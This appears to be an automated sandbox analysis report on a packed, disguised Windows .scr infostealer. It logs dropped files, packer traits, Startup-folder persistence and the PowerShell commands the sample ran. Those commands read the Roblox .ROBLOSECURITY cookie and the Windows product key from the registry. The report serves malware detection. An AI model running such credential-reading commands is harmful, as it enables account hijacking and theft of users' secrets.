failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334291854.00007FF8A8552000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343520683.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336728144.00007FF8A86E1000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.2208106332.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp, rar.exe, 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343092804.00007FF8B9841000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341409452.00007FF8B8F8C000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341828225.00007FF8B9061000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341133552.00007FF8B8CD1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339702487.00007FF8A9355000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340532745.00007FF8B8B11000.00000040.00000001.01000000.0000000F.sdmp
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: api-ms-win-core-console-l1-1-0.dll.0.dr Static PE information: 0xA9D30DED [Wed Apr 14 15:12:45 2060 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A86A7B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FF8A86A7B30
Source: _sqlite3.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x11538
Source: unicodedata.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x4f1a1
Source: _ssl.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1972f
Source: libcrypto-3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x192b2f
Source: _decimal.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1c088
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: real checksum: 0x8219e0 should be: 0x827320
Source: _lzma.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1ac45
Source: _bz2.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x188ee
Source: libffi-8.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: python312.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x1c135b
Source: _queue.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x8181
Source: _socket.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x14b65
Source: _hashlib.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xb5c7
Source: libssl-3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x396d1
Source: select.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x6d48
Source: _ctypes.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1e3bf
Source: sqlite3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xaa20d
Source: xuxqeuoy.dll.43.dr Static PE information: real checksum: 0x0 should be: 0x85b8
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr Static PE information: section name: UPX2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE55004 push rsp; retf 0_2_00007FF73AE55005
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095F01 push r12; ret 2_2_00007FF8A8095F10
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095D06 push r12; ret 2_2_00007FF8A8095D08
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8097FFF push r12; ret 2_2_00007FF8A809804A
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095C31 push r10; ret 2_2_00007FF8A8095C33
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8099327 push rsp; ret 2_2_00007FF8A8099328
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095E18 push rsp; ret 2_2_00007FF8A8095E1C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8098419 push r10; retf 2_2_00007FF8A8098485
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095F56 push r12; ret 2_2_00007FF8A8095F73
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8098F42 push rsp; iretq 2_2_00007FF8A8098F43
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A809763E push rbp; retf 2_2_00007FF8A8097657
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095E67 push rdi; iretd 2_2_00007FF8A8095E69
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8097F67 push rbp; iretq 2_2_00007FF8A8097F68
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8096859 push rsi; ret 2_2_00007FF8A8096890
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8097689 push r12; ret 2_2_00007FF8A80976CD
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A809808B push r12; iretd 2_2_00007FF8A809809F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095F7B push r8; ret 2_2_00007FF8A8095F83
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095EB4 push rsp; iretd 2_2_00007FF8A8095EB5
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095FB9 push r10; ret 2_2_00007FF8A8095FCC
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8098DBF push rsp; retf 2_2_00007FF8A8098DC0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095DF7 push r10; retf 2_2_00007FF8A8095DFA
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095CED push rdx; ret 2_2_00007FF8A8095CF7
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095CE0 push r10; retf 2_2_00007FF8A8095CE2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095CE5 push r8; ret 2_2_00007FF8A8095CEB
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A80982D8 push rdi; iretd 2_2_00007FF8A80982DA
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A872161E push rdx; iretd 2_2_00007FF8A8721621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF84769D2A5 pushad ; iretd 7_2_00007FF84769D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B00BD pushad ; iretd 7_2_00007FF8477B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B83FC push ebx; ret 7_2_00007FF8477B847A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B85FD push ebx; ret 7_2_00007FF8477B860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B860B push ebx; ret 7_2_00007FF8477B860A
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr Jump to behavior

Hooking and other Techniques for Hiding and Protection

